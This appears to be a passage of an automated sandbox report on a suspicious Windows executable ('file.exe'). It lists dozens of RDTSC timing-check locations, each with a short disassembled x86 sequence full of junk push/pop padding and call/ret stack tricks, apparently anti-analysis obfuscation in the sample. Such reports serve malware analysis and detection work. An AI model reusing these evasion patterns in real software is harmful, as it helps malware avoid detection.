                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F2D7 second address: 63F2E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640233 second address: 640239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640239 second address: 640277 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F79111F4F06h 0x00000010 push 00000000h 0x00000012 mov bl, ABh 0x00000014 adc edi, 6A4BC6F3h 0x0000001a push 00000000h 0x0000001c sub ebx, dword ptr [ebp+122D2B2Ah] 0x00000022 xchg eax, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 jo 00007F79111F4EF8h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6411E3 second address: 6411E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6411E7 second address: 6411ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6411ED second address: 64124A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F79113F0796h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 pop ebx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F79113F0798h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dword ptr [ebp+1247CC7Ah], edi 0x00000036 push ebx 0x00000037 mov dword ptr [ebp+122D30AAh], eax 0x0000003d pop ebx 0x0000003e push 00000000h 0x00000040 and bx, 8F40h 0x00000045 push 00000000h 0x00000047 mov edi, dword ptr [ebp+1245F863h] 0x0000004d push eax 0x0000004e js 00007F79113F07A4h 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6421AD second address: 642237 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F79111F4EF8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jp 00007F79111F4EF6h 0x00000017 popad 0x00000018 pushad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jmp 00007F79111F4F07h 0x00000020 popad 0x00000021 popad 0x00000022 nop 0x00000023 jmp 00007F79111F4EFCh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F79111F4EF8h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 mov dword ptr [ebp+1247CF12h], esi 0x0000004a push 00000000h 0x0000004c add dword ptr [ebp+122D188Fh], eax 0x00000052 xchg eax, esi 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F79111F4F07h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6431F6 second address: 6431FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642498 second address: 6424A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F79111F4EF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6444AA second address: 644571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F79113F07A3h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F79113F07A5h 0x00000011 nop 0x00000012 mov edi, dword ptr [ebp+122D1C3Bh] 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F79113F0798h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 mov dword ptr [ebp+122D1DBCh], ecx 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 xor edi, 6C679A92h 0x0000004c mov eax, dword ptr [ebp+122D064Dh] 0x00000052 push 00000000h 0x00000054 push edx 0x00000055 call 00007F79113F0798h 0x0000005a pop edx 0x0000005b mov dword ptr [esp+04h], edx 0x0000005f add dword ptr [esp+04h], 00000018h 0x00000067 inc edx 0x00000068 push edx 0x00000069 ret 0x0000006a pop edx 0x0000006b ret 0x0000006c mov edi, dword ptr [ebp+122D2E16h] 0x00000072 mov di, dx 0x00000075 push FFFFFFFFh 0x00000077 pushad 0x00000078 mov cx, 1766h 0x0000007c movzx ebx, bx 0x0000007f popad 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 jg 00007F79113F07A7h 0x00000089 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64553A second address: 64553F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644571 second address: 644577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6472C9 second address: 647338 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F79111F4EF8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 jmp 00007F79111F4F02h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F79111F4EF8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov dword ptr [ebp+1245F880h], esi 0x00000039 sub dword ptr [ebp+122D323Fh], edx 0x0000003f push 00000000h 0x00000041 jmp 00007F79111F4F05h 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push esi 0x0000004b pop esi 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644577 second address: 64457B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647338 second address: 64733C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64733C second address: 647346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64953B second address: 649547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C60E second address: 64C61C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64EE1F second address: 64EE28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64EE28 second address: 64EE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65140A second address: 65140E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6543FD second address: 654417 instructions: 0x00000000 rdtsc 0x00000002 js 00007F79113F07A5h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654563 second address: 65457A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F79111F4EFCh 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654709 second address: 65470D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65470D second address: 654719 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F79111F4EF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654719 second address: 654724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F79113F0796h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654724 second address: 654740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4F02h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654740 second address: 654753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jnp 00007F79113F07B4h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654753 second address: 654765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F79111F4EF6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6548F2 second address: 6548F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A562 second address: 65A566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A566 second address: 65A586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jnc 00007F79113F079Eh 0x0000000e jp 00007F79113F0798h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A586 second address: 65A58C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A58C second address: 65A590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A590 second address: 65A5A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edi 0x0000000b jnl 00007F79111F4EFCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A5A3 second address: 65A5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A5B1 second address: 65A5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661C70 second address: 661C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661C74 second address: 661C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661C78 second address: 661C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F79113F079Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661C90 second address: 661C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6623BE second address: 6623C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667EEA second address: 667F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F79111F4F08h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667F10 second address: 667F1C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F79113F079Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666C9E second address: 666CA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666CA4 second address: 666CD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Dh 0x00000007 jmp 00007F79113F07A2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jp 00007F79113F0796h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666CD1 second address: 666CE0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666CE0 second address: 666CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666CE4 second address: 666CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666CE8 second address: 666CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6412 second address: 5E6461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F79111F4F00h 0x0000000a jmp 00007F79111F4EFAh 0x0000000f push eax 0x00000010 jc 00007F79111F4EF6h 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f jmp 00007F79111F4EFCh 0x00000024 jnl 00007F79111F4EF6h 0x0000002a popad 0x0000002b push edi 0x0000002c jmp 00007F79111F4F00h 0x00000031 jnc 00007F79111F4EF6h 0x00000037 pop edi 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66727A second address: 667296 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F79113F079Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F79113F0796h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667664 second address: 667669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667669 second address: 66768A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A0h 0x00000007 jp 00007F79113F0798h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66768A second address: 66768E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66768E second address: 6676A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667837 second address: 66783B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66783B second address: 667841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667981 second address: 667989 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613A85 second address: 613A9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F79113F079Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6666A4 second address: 6666B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6666B1 second address: 6666B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6666B7 second address: 6666C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4936 second address: 5E493B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E493B second address: 5E4947 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F79111F4EFEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4947 second address: 5E4951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B5F1 second address: 66B602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F79111F4EF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632F33 second address: 632F51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F79113F0796h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632F51 second address: 632FA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b movzx ecx, bx 0x0000000e lea eax, dword ptr [ebp+12492C95h] 0x00000014 mov di, AC21h 0x00000018 sub dword ptr [ebp+122D3244h], edx 0x0000001e nop 0x0000001f jmp 00007F79111F4F08h 0x00000024 push eax 0x00000025 pushad 0x00000026 push edi 0x00000027 push edi 0x00000028 pop edi 0x00000029 pop edi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632FA1 second address: 632FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632FA5 second address: 612F49 instructions: 0x00000000 rdtsc 0x00000002 js 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F79111F4EF8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+1245F548h], esi 0x0000002c sub dword ptr [ebp+122D31FAh], ecx 0x00000032 call dword ptr [ebp+122D39B6h] 0x00000038 push eax 0x00000039 push edx 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d jns 00007F79111F4EF6h 0x00000043 pop edx 0x00000044 jmp 00007F79111F4F03h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633162 second address: 633169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633523 second address: 633529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633529 second address: 633548 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F79113F0798h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F79113F07A0h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633548 second address: 63357E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79111F4EFCh 0x00000008 jo 00007F79111F4EF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jbe 00007F79111F4F0Bh 0x0000001a jmp 00007F79111F4F05h 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63357E second address: 633596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F79113F0798h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633596 second address: 633614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub dword ptr [ebp+122D1C42h], esi 0x00000011 call 00007F79111F4EF9h 0x00000016 jmp 00007F79111F4EFBh 0x0000001b push eax 0x0000001c jmp 00007F79111F4F06h 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 jmp 00007F79111F4EFEh 0x0000002a mov eax, dword ptr [eax] 0x0000002c jno 00007F79111F4EFEh 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F79111F4F02h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633614 second address: 63361A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63361A second address: 63361E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
